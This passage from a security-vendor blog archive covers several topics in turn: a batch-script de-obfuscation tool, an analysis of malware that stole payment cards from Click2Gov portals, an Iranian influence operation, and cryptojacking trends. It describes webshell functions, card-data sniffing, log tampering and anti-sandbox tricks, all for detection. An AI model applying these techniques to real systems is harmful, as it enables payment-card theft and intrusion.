This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate ML to take an increasingly important role both at FireEye and in the rest of the cyber security industry.

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165k batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and executable programs, so unlike breaking on CreateProcess, it will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and its location varies per system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves this function’s offset using Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset. You can then supply that output as the argument to the --useoff switch in your offline machine to inform De-DOSfuscator where the function is located. Alternately, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows De-DOSfuscator log after inducing the rest of the code to run.


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse having only one cross-reference that seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible anywhere else in the code, it controls whether a function is called to dump information about the command that has been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands, because it dumps the tree in preorder traversal rather than inorder like it was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.


Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

The attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.

FIREALARM

Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial
  • medium.contact.address1
  • medium.contact.address2
  • medium.contact.city
  • medium.contact.state
  • medium.contact.zip.code

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.


Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.
  5. THN1080.tmp is deleted.

SPOTLIGHT

Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service.  When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs – the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.


Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.

Attribution

Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.

Conclusion

In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications.  Another best practice is to ensure any web service accounts run at least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.

Detection

FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)

SJavaWebManage

  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)

FIREALARM

  • e2c2d8bad36ac3e446797c485ce8b394

SPOTLIGHT

  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East

FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the U.S., U.K., Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). The activity we have uncovered is significant, and demonstrates that actors beyond Russia continue to engage in and experiment with online, social media-driven influence operations to shape political discourse.

What Is This Activity?

Figure 1 maps the registration and content promotion connections between the various inauthentic news sites and social media account clusters we have identified thus far. This activity dates back to at least 2017. At the time of publication of this blog post, we continue to investigate and identify additional social media accounts and websites linked to this activity. For example, we have identified multiple Arabic-language, Middle East-focused sites that appear to be part of this broader operation that we do not address here.


Figure 1: Connections among components of suspected Iranian influence operation

We use the term “inauthentic” to describe sites that are not transparent in their origins and affiliations, undertake concerted efforts to mask these origins, and often use false social media personas to promote their content. The content published on the various websites consists of a mix of both original content and news articles appropriated, and sometimes altered, from other sources.

Who Is Conducting this Activity and Why?

Based on an investigation by FireEye Intelligence’s Information Operations analysis team, we assess with moderate confidence that this activity originates from Iranian actors. This assessment is based on a combination of indicators, including site registration data and the linking of social media accounts to Iranian phone numbers, as well as the promotion of content consistent with Iranian political interests. For example:

  • Registrant emails for the sites ‘Liberty Front Press’ and ‘Instituto Manquehue’ are associated with advertisements for website designers in Tehran and with the Iran-based site gahvare[.]com, respectively.
  • We have identified multiple Twitter accounts directly affiliated with the sites, as well as other associated Twitter accounts, that are linked to phone numbers with the +98 Iranian country code.
  • We have observed inauthentic social media personas, masquerading as American liberals supportive of U.S. Senator Bernie Sanders, heavily promoting Quds Day, a holiday established by Iran in 1979 to express support for Palestinians and opposition to Israel.

We limit our assessment regarding Iranian origins to moderate confidence because influence operations, by their very nature, are intended to deceive by mimicking legitimate online activity as closely as possible. While highly unlikely given the evidence we have identified, some possibility nonetheless remains that the activity could originate from elsewhere, was designed for alternative purposes, or includes some small percentage of authentic online behavior. We do not currently possess additional visibility into the specific actors, organizations, or entities behind this activity. Although the Iran-linked APT35 (Newscaster) has previously used inauthentic news sites and social media accounts to facilitate espionage, we have not observed any links to APT35.

Broadly speaking, the intent behind this activity appears to be to promote Iranian political interests, including anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as to promote support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). In the context of the U.S.-focused activity, this also includes significant anti-Trump messaging and the alignment of social media personas with an American liberal identity. However, it is important to note that the activity does not appear to have been specifically designed to influence the 2018 U.S. midterm elections, as it extends well beyond U.S. audiences and U.S. politics.

Conclusion

The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media-driven influence operations as a means of shaping political discourse. These operations extend well beyond those conducted by Russia, which has often been the focus of research into information operations over recent years. Our investigation also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.

Additional Details

The full report is available for download via the link of the top right of the page.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

